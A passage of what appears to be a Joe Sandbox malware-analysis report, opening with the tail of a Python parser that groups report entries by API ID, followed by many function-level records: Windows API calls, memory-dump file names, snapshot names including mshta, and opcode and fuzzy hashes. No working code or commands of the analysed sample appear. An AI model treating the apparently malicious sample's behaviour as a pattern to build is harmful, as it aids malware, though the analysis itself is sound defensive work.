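    return [c for r in records for c in r.calls if c.name == api_name]


def group_by_api_id(records: list[FunctionRecord]) -> dict[str, list[FunctionRecord]]:
    groups: dict[str, list[FunctionRecord]] = {}
    for r in records:
        groups.setdefault(r.api_id, []).append(r)
    return groups


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for rec in recs:
        print(rec.api_id, "<-", ", ".join(f"{c.name}@{c.ref:x}" for c in rec.calls))
    for call in find_callers(recs, "VirtualAllocExNuma"):
        print(f"VirtualAllocExNuma called at {call.ref:#x}")
```

The rebuilt IDs for the three sample entries equal the "API ID" values the report prints for them, which is what makes the key useful: two functions with the same API ID can be compared by their Opcode and Instruction fuzzy hashes without first lining up call sites by address. Calls tagged "Part of subcall function" are kept in the record with `subcall_of` set, because the report's own ID (see the EnterFreeLeaveVirtual entry further down) counts them too.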

                  Control-flow Graph

                   • Graph summary: 3 basic blocks; CreateThread in 13fddb2e0-13fddb302, then either CloseHandle at 13fddb309 or the fall-through block 13fddb304-13fddb308.
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CloseCreateHandleThread
                  • String ID:
                  • API String ID: 3032276028-0
                  • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction ID: 6bda3dbe255533609f5a910cfef3119dc45450e6b5d80bd7841ac54a85dd480e
                  • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                  • Instruction Fuzzy Hash: 4AD012B6F0174082DB14EF75680535517D5BB98B54F85413CAE4D93320FE3C83168900
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction ID: b0b01d8085f2db665bc11bcc0b391e81e22eca36696b859ab90e9dedfe77ed03
                  • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                  • Instruction Fuzzy Hash: 6641B071610B4085EB128F6AE8547E633A1E759BF4F041339EA3847BE9DB38C546C340
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction ID: d393e43c255db237c99054df050ae6c3dbea4a0ebd6a327c36af7fd96f16d6c3
                  • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction Fuzzy Hash: 2131C432B01B5482EA15DB66951439A63E4FB49FD4F048539EF5C1BBD4EF38C6638340
                  APIs
                    • Part of subcall function 000000013FDE29C0: VirtualFree.KERNELBASE ref: 000000013FDE29CA
                  • EnterCriticalSection.KERNEL32(?,?,?,000000013FDF66E9,?,?,?,000000013FDFC70D), ref: 000000013FE10662
                  • LeaveCriticalSection.KERNEL32(?,?,?,000000013FDF66E9,?,?,?,000000013FDFC70D), ref: 000000013FE1068C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                  • String ID:
                  • API String ID: 1320683145-0
                  • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction ID: 60004adc6470c90660bf12f838e03f53e3edd7d62a112892d97098ac4ae5fab4
                  • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction Fuzzy Hash: BAF03C32D0865080E6129B17FDC43EA23B0E3597D1F455139EB59439B58B38CA96C700
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction ID: 56981225ee6e370abbe0924a1d1f80172b061a91b7465544e907178ebb44cc2c
                  • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction Fuzzy Hash: 94E0C235F1260082FB199B23B88579523916B5DB50FC4802CC90903360DE39825B8F50
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction ID: d34c9d4e8f51a06b6cf65686fda79833448af676da87540efa36953ac9112876
                  • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction Fuzzy Hash: 1D418072F10A5442FB92CF56D4457E96395E3A8BE4F04422AEA6D537D9DB38CA42C340
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastQueryRaiseVirtual
                  • String ID:
                  • API String ID: 3307674043-0
                  • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction ID: 2574a80db47a3bb6cea0b9e8a5d4fca593ed4c58ffe21812d337818c8100acf6
                  • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction Fuzzy Hash: B1115A72A0478082DB64AF69B4093CAB360F7457B0F14433AA6BA477D6DB78C6038700
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction ID: 5da5ae05af271de68fbe4e77799eb6e72e40913ee7187e70abe62759df83893b
                  • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction Fuzzy Hash: A6B01210F12000C2E3042B337CC2B0C03182B09B22FC40018CB04A1350CD2D82E62B10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                  • String ID: SeLockMemoryPrivilege
                  • API String ID: 1752251271-475654710
                  • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction ID: 48dcd2659c5a030ed369030c22b8a58b4b8ff6ddbd2202bda211e7893c704688
                  • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction Fuzzy Hash: 92317072A04B4086FB209FA1B44839A77A5F798BD9F104039EF4E47759DE3DC6468B40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: [ KeepUnwinding ]
                  • API String ID: 2546344036-400895726
                  • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction ID: 68d0461a2121cc91af8121da45231b82d0128e69ede8e4b767a964138fae84ab
                  • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction Fuzzy Hash: E2C16A73A05B4481EB96CFA5E5887D933A5FB44B88F58413ADE490B3E8DF31C69AC350
                  APIs
                  Strings
                  • The required instruction sets are not supported by the current CPU., xrefs: 000000013FDD570E
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: The required instruction sets are not supported by the current CPU.
                  • API String ID: 2546344036-3318624164
                  • Opcode ID: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                  • Instruction ID: 55a5a25e5934dbb38b1e4c261374974f18fa3916ee5f5989386cf45952457170
                  • Instruction Fuzzy Hash: EC718371B242384AF7B64B5EA449BDA37A5BF253D0FC4092CF5054BBE1E7399A12CB04
                  APIs
                  Similarity
                  • API ID: Time$FileSystem
                  • String ID:
                  • API String ID: 2086374402-0
                  • Opcode ID: b9729c8e631d8c46bd2c95e75bfe3429bf4dc4f5b6f10b25eebe2bb01cbc448c
                  • Instruction ID: 8a8e413456a3f9a17573355424ba3ed011fef9de2703c8a18b10b00334f01ba7
                  • Instruction Fuzzy Hash: 84215C31A05B428AE7A6DF66F84438B77A4FB8C384F50416AFA4847B71EB3CC5848740
                  APIs
                  Strings
                  Similarity
                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                  • String ID: InitializeContext2$kernel32.dll
                  • API String ID: 4102459504-3117029998
                  • Opcode ID: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction ID: 0dc9fc8a6e6e04de2b6dbe3744d252b33562645b109cdd6e113c882fdf02e838
                  • Instruction Fuzzy Hash: 55317036A05B8482FB118BA9F94439EA394BB84BE4F444439EE4903BA4EF7CD647C710
                  APIs
                  Strings
                  Similarity
                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                  • String ID: QueueUserAPC2$kernel32
                  • API String ID: 3714266957-4022151419
                  • Opcode ID: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction ID: de7611d024f97a4f2c6e53c704105f20f52554896771f39cd1e62498ee195ace
                  • Instruction Fuzzy Hash: 34318671B00A4081EA519B6AE9583EA2391BF89BE4F404338FD69477E5DF39C74BC740
                  APIs
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction ID: 8eae09a4ef5ca8fc7a7f2c46b6a04b9a8ad1072dfede27fcbb2320bf492d1883
                  • Instruction Fuzzy Hash: 33A1C430E0060186F3569FA6AC49BEA3791AB787E4F14013DFA59876E9DF36C6028301
                  APIs
                  Strings
                  Similarity
                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                  • String ID:
                  • API String ID: 510365852-3916222277
                  • Opcode ID: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction ID: 3d48e8750d219c3bd9eb17a732563a5104d8656d3e773835c03b4d8d10c5ebcd
                  • Instruction Fuzzy Hash: AF118E73A04B808AD764EF69B4453CA7361F7457B4F180339A6B94BBEACB74C6428740
                  APIs
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction ID: 4816c40bd28e867b8699d09a12b64d2c8bbb6d1c8254869c5a01efa55c7a1146
                  • Instruction Fuzzy Hash: F381A431F0074086F7569BA69848FDA3390AB887A4F14013DFA56873E9DB39C947DB41
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction ID: bbe09782a10aeb499aa6072557f8c9256206695ee2e1bcef0c52e6ab3b719bf9
                  • Instruction Fuzzy Hash: 9B71BF32B0574082FB12ABA2A548BDA63E1B759FD4F09553DAA49076E9DF38C6168300
                  APIs
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction ID: cdc72442590ebbcdb1d0d90911f944975f19f6fec8dde90cb8204a326188fcd6
                  • Instruction Fuzzy Hash: 9DE1A272B05A5585DA16CFA5E954BE873A1EB087F4F8043369A3D5BBE8DB38C11AC300
                  APIs
                  Strings
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: Process is terminating due to StackOverflowException.
                  • API String ID: 2546344036-2200901744
                  • Opcode ID: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction ID: 8877e160135d8d8083b5420f5f8e1c547bd682b4d0fb67307719a68b317e240b
                  • Instruction Fuzzy Hash: 1751A076B11F4091FF659B9AE4593E92390EB48B84F49903AFA1E43BE1DF35C6968300
                  APIs
                  • LoadLibraryExW.KERNEL32(?,?,?,?,0000000140400000,000000013FE130AD,?,?,00000000,000000013FDFFA9C,?,FFFFFFFF,47AE147AE147AE15,000000013FDE964C), ref: 000000013FE13002
                  • GetProcAddress.KERNEL32(?,?,?,?,0000000140400000,000000013FE130AD,?,?,00000000,000000013FDFFA9C,?,FFFFFFFF,47AE147AE147AE15,000000013FDE964C), ref: 000000013FE1301C
                  Strings
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                  • API String ID: 2574300362-4754247
                  • Opcode ID: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction ID: 0faefaa07dba3c346b4487cd5890f1f070fee1981778fef1be5c661be8072521
                  • Instruction Fuzzy Hash: 132100B2F252504AFFB8833AE1553FD53D39308794F96903EC90F82AE5DC1DCA829A00
                  APIs
                  Strings
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction ID: 3055ae1072405a57081882e9918db80bc75490a1020196fed807c80405ccfc16
                  • Instruction Fuzzy Hash: 0BE04626F5270081EF49AB61A8893D813907BA9B40FC8402CCD0D423A0EE3C834B8710
                  APIs
                  Strings
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction ID: cc14d5c8568a46a99550d0b5a1ed357f109a68cbec3c948986eda23ef45a9ed1
                  • Instruction Fuzzy Hash: CDE0EC26F12B4081FF59ABA1A8553D413957F89B88F88517CCD0D42390EF3C975F9B10
                  APIs
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                  • Instruction ID: 1746e6d1a80f282612aade66b251f0f8645166d82f9d2dd4e739f107e5651129
                  • Instruction Fuzzy Hash: 6941E432F1165681EFA48B3BC0413ED6290E748F98F95857EEA46877F9DA3CCA438741
                  APIs
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                  • Instruction ID: 422711571ba7822f77da8ce2d539d964d47a7e6ce41b5eb22f4c019c2d49bf5c
                  • Instruction Fuzzy Hash: C5517131F1470146F3569BA69989FEA33D4AF487A4F14423DFA06C32E1DB39DA4BD601
                  APIs
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                  • Instruction ID: 91afad54c3724b9a709d560aa616d1c1621324f66a873d2b447c82e94046b3fc
                  • Instruction Fuzzy Hash: 2F41D432A057C581FA619F52E1003EEABE1E758B98F1B003DDE49173A6DB74CAA3C341
                  APIs
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                  • Instruction ID: 115b119365221caf15a79ee139665874aa6690dd15874f8290ee5322045a383e
                  • Instruction Fuzzy Hash: 8E31C532A01B4482EA259F95A1487DDF7E4F796B98F08013CEF49477D9CF78CA468340
                  APIs
                  Similarity
                  • API ID: ErrorLastMultipleWait$HandlesObjects
                  • String ID:
                  • API String ID: 2817213684-0
                  • Opcode ID: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                  • Instruction ID: 49ec30e371c030a354f532bd614b9db0f405832a83b4992f8126cafa3ca7afdd
                  • Instruction Fuzzy Hash: 31118232A08A5483D7244B6AB40435AB7A5FB44795F14413DFEC947BE5DF38C6428B40
                  APIs
                  Similarity
                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                  • String ID:
                  • API String ID: 2933794660-0
                  • Opcode ID: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction ID: 31028eb2359e75b63a3022b5c6168ecf75a32af80d7fb7f1a30c0e27b1f87b84
                  • Opcode Fuzzy Hash: efb2c1910f7fe4eb1fdb9db6ef462f9c960acadc62b879df81811dfe8f91f112
                  • Instruction Fuzzy Hash: 2711E836B11B048AEB009F71E8553E933A4F759BA8F441A35EF6D867A4EF78C1958340
                  APIs
                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FE39A6B), ref: 000000013FE3A930
                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FE39A6B), ref: 000000013FE3A971
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFileHeaderRaise
                  • String ID: csm
                  • API String ID: 2573137834-1018135373
                  • Opcode ID: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction ID: 898eb3db3ab716e6f69f385de511f4da01fc39c2c03eecf41231e21ab87eb2ba
                  • Opcode Fuzzy Hash: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                  • Instruction Fuzzy Hash: 70112B36614B8482EB618F25F44439977E5F788B94F594239DF8C57B68DF38C6528B00
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3E5A
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3E9C
                  • EnterCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3EC7
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,000000013FDF3F8F,?,?,?,000000013FE0025A), ref: 000000013FDF3EE8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction ID: 54c7539f169c7a4b23b867fec7a10be4e48d413712afd09cf844683ceacd9fe7
                  • Opcode Fuzzy Hash: 76d884de7bf17c7811e84ddf0ad67568b996faf9851ca8ebb35a4ad0458fe3ff
                  • Instruction Fuzzy Hash: 5A211D71A14A0581EA53DF26EDC43E623B0EB193E0F881239E629476F5DB7DC69AC300
                  Memory Dump Source
                  • Source File: 00000010.00000003.473025678.0000000003000000.00000010.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_16_3_3000000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
